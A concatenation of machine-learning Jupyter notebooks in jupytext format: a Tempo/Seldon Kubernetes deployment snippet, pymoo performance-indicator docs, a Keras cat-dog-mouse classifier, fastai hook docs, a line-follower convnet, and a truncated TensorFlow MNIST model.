from tempo.serve.metadata import RuntimeOptions, KubernetesOptions
runtime_options = RuntimeOptions(
k8s_options=KubernetesOptions(
namespace="production",
authSecretName="minio-secret"
)
)
# +
from tempo.seldon.k8s import SeldonKubernetesRuntime
k8s_runtime = SeldonKubernetesRuntime(runtime_options)
k8s_runtime.deploy(explainer)
k8s_runtime.wait_ready(explainer)
# -
r = json.loads(explainer.remote(payload=data.X_test[0:1], parameters={"threshold":0.95}))
print(r["data"]["anchor"])
k8s_runtime.undeploy(explainer)
# ## Production Option 2 (Gitops)
#
# * We create yaml to provide to our DevOps team to deploy to a production cluster
# * We add Kustomize patches to modify the base Kubernetes yaml created by Tempo
# +
from tempo.seldon.k8s import SeldonKubernetesRuntime
k8s_runtime = SeldonKubernetesRuntime(runtime_options)
yaml_str = k8s_runtime.to_k8s_yaml(explainer)
with open(os.getcwd()+"/k8s/tempo.yaml","w") as f:
f.write(yaml_str)
# -
# !kustomize build k8s
|
docs/examples/explainer/README.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_performance_indicator:
# -
# ## Performance Indicator
# It is fundamental for any algorithm to measure the performance. In a multi-objective scenario, we can not calculate the distance to the true global optimum but must consider a set of solutions. Moreover, sometimes the optimum is not even known, and other techniques must be used.
#
# First, let us consider a scenario where the Pareto-front is known:
# + code="usage_performance_indicator.py" section="load_data"
import numpy as np
from pymoo.factory import get_problem
from pymoo.visualization.scatter import Scatter
# The pareto front of a scaled zdt1 problem
pf = get_problem("zdt1").pareto_front()
# The result found by an algorithm
A = pf[::10] * 1.1
# plot the result
Scatter(legend=True).add(pf, label="Pareto-front").add(A, label="Result").show()
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_gd:
# -
# ### Generational Distance (GD)
#
# The GD performance indicator <cite data-cite="gd"></cite> measure the distance from solution to the Pareto-front. Let us assume the points found by our algorithm are the objective vector set $A=\{a_1, a_2, \ldots, a_{|A|}\}$ and the reference points set (Pareto-front) is $Z=\{z_1, z_2, \ldots, z_{|Z|}\}$. Then,
#
# \begin{align}
# \begin{split}
# \text{GD}(A) & = & \; \frac{1}{|A|} \; \bigg( \sum_{i=1}^{|A|} d_i^p \bigg)^{1/p}\\[2mm]
# \end{split}
# \end{align}
#
# where $d_i$ represents the Euclidean distance (p=2) from $a_i$ to its nearest reference point in $Z$. Basically, this results in the average distance from any point $A$ to the closest point in the Pareto-front.
# + code="usage_performance_indicator.py" section="gd"
from pymoo.factory import get_performance_indicator
gd = get_performance_indicator("gd", pf)
print("GD", gd.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_gd_plus:
# -
# ### Generational Distance Plus (GD+)
#
# Ishibushi et. al. proposed in <cite data-cite="igd_plus"></cite> GD+:
#
# \begin{align}
# \begin{split}
# \text{GD}^+(A) & = & \; \frac{1}{|A|} \; \bigg( \sum_{i=1}^{|A|} {d_i^{+}}^2 \bigg)^{1/2}\\[2mm]
# \end{split}
# \end{align}
#
# where for minimization $d_i^{+} = max \{ a_i - z_i, 0\}$ represents the modified distance from $a_i$ to its nearest reference point in $Z$ with the corresponding value $z_i$.
# + code="usage_performance_indicator.py" section="gd_plus"
from pymoo.factory import get_performance_indicator
gd_plus = get_performance_indicator("gd+", pf)
print("GD+", gd_plus.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_igd:
# -
# ### Inverted Generational Distance (IGD)
#
# The IGD performance indicator <cite data-cite="igd"></cite> inverts the generational distance and measures the distance from any point in $Z$ to the closest point in $A$.
#
# \begin{align}
# \begin{split}
# \text{IGD}(A) & = & \; \frac{1}{|Z|} \; \bigg( \sum_{i=1}^{|Z|} \hat{d_i}^p \bigg)^{1/p}\\[2mm]
# \end{split}
# \end{align}
#
# where $\hat{d_i}$ represents the euclidean distance (p=2) from $z_i$ to its nearest reference point in $A$.
#
# + code="usage_performance_indicator.py" section="igd"
from pymoo.factory import get_performance_indicator
igd = get_performance_indicator("igd", pf)
print("IGD", igd.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_igd_plus:
# -
# ### Inverted Generational Distance Plus (IGD+)
#
# In <cite data-cite="igd_plus"></cite> Ishibushi et. al. proposed IGD+ which is weakly Pareto compliant wheres the original IGD is not.
#
# \begin{align}
# \begin{split}
# \text{IGD}^{+}(A) & = & \; \frac{1}{|Z|} \; \bigg( \sum_{i=1}^{|Z|} {d_i^{+}}^2 \bigg)^{1/2}\\[2mm]
# \end{split}
# \end{align}
#
# where for minimization $d_i^{+} = max \{ a_i - z_i, 0\}$ represents the modified distance from $z_i$ to the closest solution in $A$ with the corresponding value $a_i$.
#
# + code="usage_performance_indicator.py" section="igd_plus"
from pymoo.factory import get_performance_indicator
igd_plus = get_performance_indicator("igd+", pf)
print("IGD+", igd_plus.calc(A))
# + raw_mimetype="text/restructuredtext" active=""
# .. _nb_hv:
# -
# ### Hypervolume
# For all performance indicators showed so far, a target set needs to be known. For Hypervolume only a reference point needs to be provided. First, I would like to mention that we are using the Hypervolume implementation from [DEAP](https://deap.readthedocs.io/en/master/). It calculates the area/volume, which is dominated by the provided set of solutions with respect to a reference point.
# <div style="display: block;margin-left: auto;margin-right: auto;width: 40%;">
# 
# </div>
# This image is taken from <cite data-cite="hv"></cite> and illustrates a two objective example where the area which is dominated by a set of points is shown in grey.
# Whereas for the other metrics, the goal was to minimize the distance to the Pareto-front, here, we desire to maximize the performance metric.
# + code="usage_performance_indicator.py" section="hv"
from pymoo.factory import get_performance_indicator
hv = get_performance_indicator("hv", ref_point=np.array([1.2, 1.2]))
print("hv", hv.calc(A))
|
doc/source/misc/performance_indicator.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Cat-Dog-Mouse Classifier
#
# This project is a hybrid of a multi-class classification tutorial and a binary classification project
#
# Multi-class classification tutorial: https://stackabuse.com/creating-a-neural-network-from-scratch-in-python-multi-class-classification/
# Binary classification project: https://github.com/ardamavi/Dog-Cat-Classifier
#
# The jupyter notebook used as a template and some content was borrowed from https://www.coursera.org/learn/neural-networks-deep-learning/
#
#
# ## 1 - Packages
# Let's first import all the packages that we will need during this project.
# - [os](https://docs.python.org/3/library/os.html) contains functions for interacting with the operating system.
# - [sys](https://docs.python.org/3/library/sys.html) provides access to system-specific parameters and functions.
# - [time](https://docs.python.org/3/library/time.html) provides various time-related functions.
# - [keras](https://keras.io) is a deep learning library and neural networks API.
# - [numpy](https://www.numpy.org/) is the fundamental package for scientific computing with Python.
# - [h5py](http://www.h5py.org) is a common package to interact with a dataset that is stored on an H5 file.
# - [matplotlib](http://matplotlib.org) is a library to plot graphs in Python. Some parameters are defined here.
# - [scipy](https://www.scipy.org/) and [PIL](http://www.pythonware.com/products/pil/) are used here to test your model with your own picture at the end.
# - [skimage](https://scikit-image.org/) is used for image processing.
# - [sklearn](https://scikit-learn.org/) is a machine learning library.
# - [pydot] and [graphviz] are used for plotting the model.
#
#
# - *%autosave 0* is used to disable jupyter's autosave feature.
# - *%autoreload 2* is used to auto-reload modules.
# - *np.random.seed(1)* is used to keep all the random function calls consistent.
#
# +
import os
import sys
import time
import keras
import numpy as np
import h5py
import matplotlib.pyplot as plt
import scipy
import skimage
import pydot
import graphviz
from PIL import Image
from scipy import ndimage
from skimage import io
from sklearn.model_selection import train_test_split
# %matplotlib inline
plt.rcParams['figure.figsize'] = (5.0, 4.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
# %load_ext autoreload
# %autoreload 2
# %autosave 0
np.random.seed(1)
# -
# ## 2 - Dataset
#
# The get_dataset() function and its get_img() helper function are used to load images from the ./Data/Train_Data/ directory and create numpy arrays X and Y in ./Data/npy_train_data/ containing the image data and one-hot-encoded labels, respectively.
# The train_test_split function from sklearn.model_selection is used to split the numpy arrays into random train and test subsets.
#
#
# +
def get_img(data_path):
# Getting image array from path:
img_size = 64
img = Image.open(data_path)
img = img.resize((img_size, img_size))
img = np.array(img)
return img
def get_dataset(dataset_path='Data/Train_Data'):
# Getting all data from data path:
try:
X = np.load('Data/npy_train_data/X.npy')
Y = np.load('Data/npy_train_data/Y.npy')
except:
labels = sorted(os.listdir(dataset_path)) # Geting labels
print('Categories:\n', labels)
len_datas = 0
for label in labels:
len_datas += len(os.listdir(dataset_path+'/'+label))
X = np.zeros((len_datas, 64, 64, 3), dtype='float64')
Y = np.zeros(len_datas)
count_data = 0
count_categori = [-1,''] # For encode labels
for label in labels:
print('Loading ' + label + ' data...')
datas_path = dataset_path+'/'+label
for data in os.listdir(datas_path):
img = get_img(datas_path+'/'+data)
X[count_data] = img
# For encode labels:
if label != count_categori[1]:
count_categori[0] += 1
count_categori[1] = label
Y[count_data] = count_categori[0]
count_data += 1
# Create dataset:
Y = keras.utils.to_categorical(Y)
if not os.path.exists('Data/npy_train_data/'):
os.makedirs('Data/npy_train_data/')
np.save('Data/npy_train_data/X.npy', X)
np.save('Data/npy_train_data/Y.npy', Y)
X /= 255.
X, X_test, Y, Y_test = train_test_split(X, Y, test_size=0.1, random_state=42, shuffle=True)
print("Dataset loaded.")
return X, X_test, Y, Y_test
# +
##### Run the code in this cell to import the data
X, X_test, Y, Y_test = get_dataset()
# -
# ## 3 - Model
#
# The get_model() function and its save_model() helper function create the model using the Keras Sequential model API (https://keras.io/models/sequential/) and save the model and weights in ./Data/Model/ as json and HDF5, respectively.
#
#
# +
def save_model(model):
if not os.path.exists('Data/Model/'):
os.makedirs('Data/Model/')
model_json = model.to_json()
with open("Data/Model/model.json", "w") as model_file:
model_file.write(model_json)
# serialize weights to HDF5
model.save_weights("Data/Model/weights.h5")
print('Model and weights saved.')
return
def get_model(num_classes=3):
model = keras.models.Sequential()
model.add(keras.layers.Conv2D(32, (3, 3), input_shape=(64, 64, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Conv2D(32, (3, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Conv2D(64, (3, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Conv2D(64, (3, 3)))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.MaxPooling2D(pool_size=(2, 2)))
model.add(keras.layers.Flatten())
model.add(keras.layers.Dense(64))
model.add(keras.layers.Activation('relu'))
model.add(keras.layers.Dropout(0.5))
model.add(keras.layers.Dense(num_classes))
model.add(keras.layers.Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adadelta', metrics=['accuracy'])
print(model.summary())
return model
# +
##### Run the code in this cell to generate the model and save it and the weights.
model = get_model(len(Y[0]))
save_model(model)
# -
# ## 4 - Train
#
# The train_model() function uses the model generated by the get_model() and save_model() functions and processes the training data and runs a validation against the test data that were input and split in the get_dataset() function.
#
#
# +
def train_model(model, X, X_test, Y, Y_test):
checkpoints = []
if not os.path.exists('Data/Checkpoints/'):
os.makedirs('Data/Checkpoints/')
checkpoints.append(keras.callbacks.ModelCheckpoint('Data/Checkpoints/best_weights.h5', monitor='val_loss', verbose=0, save_best_only=True, save_weights_only=True, mode='auto', period=1))
checkpoints.append(keras.callbacks.TensorBoard(log_dir='Data/Checkpoints/./logs', histogram_freq=0, write_graph=True, write_images=False, embeddings_freq=0, embeddings_layer_names=None, embeddings_metadata=None))
# Creates live data:
# For better yield. The duration of the training is extended.
# If you don't want, use this:
#model.fit(X, Y, batch_size=10, epochs=25, validation_data=(X_test, Y_test), shuffle=True, callbacks=checkpoints)
generated_data = keras.preprocessing.image.ImageDataGenerator(featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False, samplewise_std_normalization=False, zca_whitening=False, rotation_range=0, width_shift_range=0.1, height_shift_range=0.1, horizontal_flip = True, vertical_flip = False)
generated_data.fit(X)
model.fit_generator(generated_data.flow(X, Y, batch_size=8), steps_per_epoch=X.shape[0]//8, epochs=64, validation_data=(X_test, Y_test), callbacks=checkpoints, shuffle=True)
return model
# +
model = train_model(model, X, X_test, Y, Y_test)
save_model(model)
# -
# ## 5 - Predict
#
# The predict() function uses the saved model's predict method to generate an output prediction for a sample image.
# +
def predict(model, img_array):
prediction = model.predict(img_array)
prediction = np.argmax(prediction, axis=1)
if prediction[0] == 0:
prediction = 'cat'
elif prediction[0] == 1:
prediction = 'dog'
elif prediction[0] == 2:
prediction = 'mouse'
return prediction
# -
# ## 6 - Test with your own image
#
# You can use your own image and see the output of your model. To do that:
# 1. Add your image to this Jupyter Notebook's directory, in the "images" folder.
# 2. Change your image's name in the following code.
# 3. Run the code and check if the algorithm is right (0 = cat, 1 = dog, 2 = mouse)!
#
#
# +
img_name = "test_dog.jpg" # change this to the name of your image file
img_dir = "images/" + img_name
img = get_img(img_dir)
img_array = np.zeros((1, 64, 64, 3), dtype='float64')
img_array[0] = img
# Getting model:
model_file = open('Data/Model/model.json', 'r')
model = model_file.read()
model_file.close()
model = keras.models.model_from_json(model)
# Getting weights
model.load_weights("Data/Model/weights.h5")
prediction = predict(model, img_array)
print('It is a ' + prediction + '!')
|
cat-dog-mouse-classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Hook callbacks
# This provides both a standalone class and a callback for registering and automatically deregistering [PyTorch hooks](https://pytorch.org/tutorials/beginner/former_torchies/nn_tutorial.html#forward-and-backward-function-hooks), along with some pre-defined hooks. Hooks can be attached to any [`nn.Module`](https://pytorch.org/docs/stable/nn.html#torch.nn.Module), for either the forward or the backward pass.
#
# We'll start by looking at the pre-defined hook [`ActivationStats`](/callbacks.hooks.html#ActivationStats), then we'll see how to create our own.
# + hide_input=true
from fastai.gen_doc.nbdoc import *
from fastai.callbacks.hooks import *
from fastai import *
from fastai.train import *
from fastai.vision import *
# + hide_input=true
show_doc(ActivationStats)
# -
# [`ActivationStats`](/callbacks.hooks.html#ActivationStats) saves the layer activations in `self.stats` for all `modules` passed to it. By default it will save activations for *all* modules. For instance:
path = untar_data(URLs.MNIST_SAMPLE)
data = ImageDataBunch.from_folder(path)
learn = create_cnn(data, models.resnet18, callback_fns=ActivationStats)
learn.fit(1)
# The saved `stats` is a `FloatTensor` of shape `(2,num_modules,num_batches)`. The first axis is `(mean,stdev)`.
len(learn.data.train_dl),len(learn.activation_stats.modules)
learn.activation_stats.stats.shape
# So this shows the standard deviation (`axis0==1`) of 5th last layer (`axis1==-5`) for each batch (`axis2`):
plt.plot(learn.activation_stats.stats[1][-5].numpy());
# + hide_input=true
show_doc(Hook)
# -
# Registers and manually deregisters a [PyTorch hook](https://pytorch.org/tutorials/beginner/former_torchies/nn_tutorial.html#forward-and-backward-function-hooks). Your `hook_func` will be called automatically when forward/backward (depending on `is_forward`) for your module `m` is run, and the result of that function is placed in `self.stored`.
# + hide_input=true
show_doc(Hook.remove)
# -
# Deregister the hook, if not called already.
# + hide_input=true
show_doc(Hooks)
# -
# Acts as a `Collection` (i.e. `len(hooks)` and `hooks[i]`) and an `Iterator` (i.e. `for hook in hooks`) of a group of hooks, one for each module in `ms`, with the ability to remove all as a group. Use `stored` to get all hook results. `hook_func` and `is_forward` behavior is the same as [`Hook`](/callbacks.hooks.html#Hook). See the source code for [`HookCallback`](/callbacks.hooks.html#HookCallback) for a simple example.
# + hide_input=true
show_doc(Hooks.remove)
# -
# Deregister all hooks created by this class, if not previously called.
# ## Convenience functions for hooks
# + hide_input=true
show_doc(hook_output)
# -
# Function that creates a [`Hook`](/callbacks.hooks.html#Hook) for `module` that simply stores the output of the layer.
# + hide_input=true
show_doc(hook_outputs)
# -
# Function that creates a [`Hook`](/callbacks.hooks.html#Hook) for all passed `modules` that simply stores the output of the layers. For example, the (slightly simplified) source code of [`model_sizes`](/callbacks.hooks.html#model_sizes) is:
#
# ```python
# def model_sizes(m, size):
# x = m(torch.zeros(1, in_channels(m), *size))
# return [o.stored.shape for o in hook_outputs(m)]
# ```
# + hide_input=true
show_doc(model_sizes)
# + hide_input=true
show_doc(num_features_model)
# -
# It can be useful to get the size of each layer of a model (e.g. for printing a summary, or for generating cross-connections for a [`DynamicUnet`](/vision.models.unet.html#DynamicUnet)), however they depend on the size of the input. This function calculates the layer sizes by passing in a minimal tensor of `size`.
# + hide_input=true
show_doc(HookCallback)
# -
# For all `modules`, uses a callback to automatically register a method `self.hook` (that you must define in an inherited class) as a hook. This method must have the signature:
#
# ```python
# def hook(self, m:Model, input:Tensors, output:Tensors)
# ```
#
# If `do_remove` then the hook is automatically deregistered at the end of training. See [`ActivationStats`](/callbacks.hooks.html#ActivationStats) for a simple example of inheriting from this class.
# ## Undocumented Methods - Methods moved below this line will intentionally be hidden
# + hide_input=true
show_doc(HookCallback.remove)
# + hide_input=true
show_doc(HookCallback.on_train_begin)
# + hide_input=true
show_doc(HookCallback.on_train_end)
# + hide_input=true
show_doc(ActivationStats.hook)
# + hide_input=true
show_doc(ActivationStats.on_batch_end)
# + hide_input=true
show_doc(ActivationStats.on_train_begin)
# + hide_input=true
show_doc(ActivationStats.on_train_end)
# -
# ## New Methods - Please document or move to the undocumented section
# + hide_input=true
show_doc(Hook.hook_fn)
# -
#
|
docs_src/callbacks.hooks.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:deepLearning]
# language: python
# name: conda-env-deepLearning-py
# ---
# # Line Follower - CompRobo17
# This notebook will show the general procedure to use our project data directories and how to do a regression task using convnets
# ## Imports and Directories
#Create references to important directories we will use over and over
import os, sys
# +
#import modules
import numpy as np
from glob import glob
from PIL import Image
from tqdm import tqdm
from scipy.ndimage import zoom
from keras.models import Sequential
from keras.metrics import categorical_crossentropy, categorical_accuracy
from keras.layers.convolutional import *
from keras.preprocessing import image
from keras.layers.core import Flatten, Dense
from keras.optimizers import Adam
from keras.layers.normalization import BatchNormalization
from matplotlib import pyplot as plt
import seaborn as sns
# %matplotlib inline
# -
import bcolz
# Create paths to data directories
# +
DATA_HOME_DIR = '/home/nathan/olin/spring2017/line-follower/line-follower/data'
# %cd $DATA_HOME_DIR
path = DATA_HOME_DIR
train_path1=path + '/sun_apr_16_office_full_line_1'
train_path2=path + '/qea_blob_1'
valid_path1=path + '/qea-square_3'
# -
# ## Helper Functions
# Throughout the notebook, we will take advantage of helper functions to cleanly process our data.
def resize_vectorized4D(data, new_size=(64, 64)):
"""
A vectorized implementation of 4d image resizing
Args:
data (4D array): The images you want to resize
new_size (tuple): The desired image size
Returns: (4D array): The resized images
"""
fy, fx = np.asarray(new_size, np.float32) / data.shape[1:3]
return zoom(data, (1, fy, fx, 1), order=1) # order is the order of spline interpolation
def lowerHalfImage(array):
"""
Returns the lower half rows of an image
Args: array (array): the array you want to extract the lower half from
Returns: The lower half of the array
"""
return array[round(array.shape[0]/2):,:,:]
# +
def folder_to_numpy(image_directory_full):
"""
Read sorted pictures (by filename) in a folder to a numpy array.
We have hardcoded the extraction of the lower half of the images as
that is the relevant data
USAGE:
data_folder = '/train/test1'
X_train = folder_to_numpy(data_folder)
Args:
data_folder (str): The relative folder from DATA_HOME_DIR
Returns:
picture_array (np array): The numpy array in tensorflow format
"""
# change directory
print ("Moving to directory: " + image_directory_full)
os.chdir(image_directory_full)
# read in filenames from directory
g = glob('*.png')
if len(g) == 0:
g = glob('*.jpg')
print ("Found {} pictures".format(len(g)))
# sort filenames
g.sort()
# open and convert images to numpy array - then extract the lower half of each image
print("Starting pictures to numpy conversion")
picture_arrays = np.array([lowerHalfImage(np.array(Image.open(image_path))) for image_path in g])
# reshape to tensorflow format
# picture_arrays = picture_arrays.reshape(*picture_arrays.shape, 1)
print ("Shape of output: {}".format(picture_arrays.shape))
# return array
return picture_arrays
return picture_arrays.astype('float32')
# -
def flip4DArray(array):
""" Produces the mirror images of a 4D image array """
return array[..., ::-1,:] #[:,:,::-1] also works but is 50% slower
def concatCmdVelFlip(array):
""" Concatentaes and returns Cmd Vel array """
return np.concatenate((array, array*-1)) # multiply by negative 1 for opposite turn
def save_array(fname, arr):
c=bcolz.carray(arr, rootdir=fname, mode='w')
c.flush()
def load_array(fname):
return bcolz.open(fname)[:]
# ## Data
# Because we are using a CNN and unordered pictures, we can flip our data and concatenate it on the end of all training and validation data to make sure we don't bias left or right turns.
# ### Training Data
# Extract and store the training data in X_train and Y_train
def get_data(paths):
X_return = []
Y_return = []
for path in paths:
# %cd $path
Y_train = np.genfromtxt('cmd_vel.csv', delimiter=',')[:,1] # only use turning angle
Y_train = np.concatenate((Y_train, Y_train*-1))
X_train = folder_to_numpy(path + '/raw')
X_train = np.concatenate((X_train, flip4DArray(X_train)))
X_return.extend(X_train)
Y_return.extend(Y_train)
return np.array(X_return), np.array(Y_return)
X_train, Y_train = get_data([train_path1, train_path2])
X_train.shape
X_valid, Y_valid = get_data([valid_path1])
X_valid.shape
Y_valid.shape
# Visualize the training data, currently using a hacky method to display the numpy matrix as this is being run over a remote server and I can't view new windows
# %cd /tmp
for i in range(300):
img = Image.fromarray(X_train[286+286+340+i], 'RGB')
data = np.asarray(img)[...,[2,1,0]]
img = Image.fromarray(data)
img.save("temp{}.jpg")
image.load_img("temp.jpg")
# ### Validation Data
# Follow the same steps for as the training data for the validation data.
# +
# # %cd $valid_path
# Y_valid = np.genfromtxt('cmd_vel.csv', delimiter=',')[:,1]
# Y_valid = np.concatenate((Y_valid, Y_valid*-1))
# X_valid = folder_to_numpy(valid_path + '/raw')
# X_valid = np.concatenate((X_valid, flip4DArray(X_valid)))
# -
# Test the shape of the arrays:
# X_valid: (N, 240, 640, 3)
# Y_valid: (N,)
X_valid.shape, Y_valid.shape
# ### Resize Data
# When we train the network, we don't want to be dealing with (240, 640, 3) images as they are way too big. Instead, we will resize the images to something more managable, like (64, 64, 3) or (128, 128, 3). In terms of network predictive performance, we are not concerned with the change in aspect ratio, but might want to test a (24, 64, 3) images for faster training
img_rows, img_cols = (64, 64)
print(img_rows)
print(img_cols)
X_train = resize_vectorized4D(X_train, (img_rows, img_cols))
X_valid = resize_vectorized4D(X_valid, (img_rows, img_cols))
print(X_train.shape)
print(X_valid.shape)
# Visualize newly resized image.
# %cd /tmp
img = Image.fromarray(X_train[np.random.randint(0, X_train.shape[0])], 'RGB')
img.save("temp.jpg")
image.load_img("temp.jpg")
# ### Batches
# gen allows us to normalize and augment our images. We will just use it to rescale the images.
gen = image.ImageDataGenerator(
# rescale=1. / 255 # normalize data between 0 and 1
)
# Next, create the train and valid generators, these are shuffle and have a batch size of 32 by default
# +
train_generator = gen.flow(X_train, Y_train)#, batch_size=batch_size, shuffle=True)
valid_generator = gen.flow(X_valid, Y_valid)#, batch_size=batch_size, shuffle=True)
# get_batches(train_path, batch_size=batch_size,
# target_size=in_shape,
# gen=gen)
# val_batches = get_batches(valid_path, batch_size=batch_size,
# target_size=in_shape,
# gen=gen)
# -
data, category = next(train_generator)
print ("Shape of data: {}".format(data[0].shape))
# %cd /tmp
img = Image.fromarray(data[np.random.randint(0, data.shape[0])].astype('uint8'), 'RGB')
img.save("temp.jpg")
image.load_img("temp.jpg")
# ## Convnet
# ### Constants
in_shape = (img_rows, img_cols, 3)
# ### Model
# Our test model will use a VGG like structure with a few changes. We are removing the final activation function. We will also use either mean_absolute_error or mean_squared_error as our loss function for regression purposes.
def get_model():
model = Sequential([
Convolution2D(32,3,3, border_mode='same', activation='relu', input_shape=in_shape),
MaxPooling2D(),
Convolution2D(64,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Convolution2D(128,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Flatten(),
Dense(2048, activation='relu'),
Dense(1024, activation='relu'),
Dense(512, activation='relu'),
Dense(1)
])
model.compile(loss='mean_absolute_error', optimizer='adam')
return model
model = get_model()
model.summary()
# ### Train
history = model.fit_generator(train_generator,
samples_per_epoch=train_generator.n,
nb_epoch=5,
validation_data=valid_generator,
nb_val_samples=valid_generator.n,
verbose=True)
# +
# # %cd $DATA_HOME_DIR
# model.save_weights('epoche_QEA_carpet_425.h5')
# +
# # %cd $DATA_HOME_DIR
# model.save_weights('epoche_2500.h5')
# -
# %cd $DATA_HOME_DIR
model.load_weights('epoche_QEA_carpet_425.h5')
len(model.layers)
model.pop()
len(model.layers)
model.compile(loss='mean_absolute_error', optimizer='adam')
model.summary()
X_train_features = model.predict(X_train)
X_valid_features = model.predict(X_valid)
for x,y in zip(Y_valid, X_valid_features):
print (x, y[0])
# %cd $train_path2
save_array("X_train_features3.b", X_train_features)
# %cd $valid_path1
save_array("X_train_features3.b", X_valid_features)
X_train_features[9]
def get_model_lstm():
model = Sequential([
Convolution2D(32,3,3, border_mode='same', activation='relu', input_shape=in_shape),
MaxPooling2D(),
Convolution2D(64,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Convolution2D(128,3,3, border_mode='same', activation='relu'),
MaxPooling2D(),
Flatten(),
Dense(2048, activation='relu'),
Dense(1024, activation='relu'),
Dense(512, activation='relu'),
Dense(1)
])
model.compile(loss='mean_absolute_error', optimizer='adam')
return model
X_train.shape
# + [markdown] heading_collapsed=true
# ### Visualize Training
# + hidden=true
val_plot = np.convolve(history.history['val_loss'], np.repeat(1/10, 10), mode='valid')
train_plot = np.convolve(history.history['loss'], np.repeat(1/10, 10), mode='valid')
# + hidden=true
sns.tsplot(val_plot)
# + hidden=true
X_preds = model.predict(X_valid).reshape(X_valid.shape[0],)
for i in range(len(X_valid)):
print("{:07f} | {:07f}".format(Y_valid[i], X_preds[i]))
# + hidden=true
X_train_preds = model.predict(X_train).reshape(X_train.shape[0],)
for i in range(len(X_train_preds)):
print("{:07f} | {:07f}".format(Y_train[i], X_train_preds[i]))
# + [markdown] hidden=true
# Notes
# * 32 by 32 images are too small resolution for regression
# * 64 by 64 seemed to work really well
# * Moving average plot to see val_loss over time is really nice
# * Can take up to 2000 epochs to reach a nice minimum
# + hidden=true
X_preds.shape
# + hidden=true
X_train_preds.shape
# + hidden=true
np.savetxt("X_train_valid.csv", X_preds, fmt='%.18e', delimiter=',', newline='\n')
np.savetxt("X_train_preds.csv", X_train_preds, fmt='%.18e', delimiter=',', newline='\n')
# + hidden=true
|
line-follower/src/v1/convnet_regression_circle_and_carpet.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # lambda * loss1 + (1 - lambda) * loss2
# +
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
def cnn_model_fn(features, labels, mode):
"""Model function for CNN."""
# Input Layer
# Reshape X to 4-D tensor: [batch_size, width, height, channels]
# MNIST images are 28x28 pixels, and have one color channel
input_layer = tf.reshape(features["x"], [-1, 28, 28, 1])
print("_THIS_",type(features))
# Convolutional Layer #1
# Computes 32 features using a 5x5 filter with ReLU activation.
# Padding is added to preserve width and height.
# Input Tensor Shape: [batch_size, 28, 28, 1]
# Output Tensor Shape: [batch_size, 28, 28, 32]
conv1 = tf.layers.conv2d(
inputs=input_layer,
filters=32,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
# Pooling Layer #1
# First max pooling layer with a 2x2 filter and stride of 2
# Input Tensor Shape: [batch_size, 28, 28, 32]
# Output Tensor Shape: [batch_size, 14, 14, 32]
pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)
# Convolutional Layer #2
# Computes 64 features using a 5x5 filter.
# Padding is added to preserve width and height.
# Input Tensor Shape: [batch_size, 14, 14, 32]
# Output Tensor Shape: [batch_size, 14, 14, 64]
conv2 = tf.layers.conv2d(
inputs=pool1,
filters=64,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu)
# Pooling Layer #2
# Second max pooling layer with a 2x2 filter and stride of 2
# Input Tensor Shape: [batch_size, 14, 14, 64]
# Output Tensor Shape: [batch_size, 7, 7, 64]
pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)
# Flatten tensor into a batch of vectors
# Input Tensor Shape: [batch_size, 7, 7, 64]
# Output Tensor Shape: [batch_size, 7 * 7 * 64]
pool2_flat = tf.reshape(pool2, [-1, 7 * 7 * 64])
# Dense Layer
# Densely connected layer with 1024 neurons
# Input Tensor Shape: [batch_size, 7 * 7 * 64]
# Output Tensor Shape: [batch_size, 1024]
dense = tf.layers.dense(inputs=pool2_flat, units=1024, activation=tf.nn.relu)
# Add dropout operation; 0.6 probability that element will be kept
dropout = tf.layers.dropout(
inputs=dense, rate=0.4, training=mode == tf.estimator.ModeKeys.TRAIN)
# Logits layer
# Input Tensor Shape: [batch_size, 1024]
# Output Tensor Shape: [batch_size, 10]
logits = tf.layers.dense(inputs=dropout, units=10)
predictions = {
# Generate predictions (for PREDICT and EVAL mode)
"classes": tf.argmax(input=logits, axis=1),
# Add `softmax_tensor` to the graph. It is used for PREDICT and by the
# `logging_hook`.
"probabilities": tf.nn.softmax(logits/temprature, name="softmax_tensor")
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)
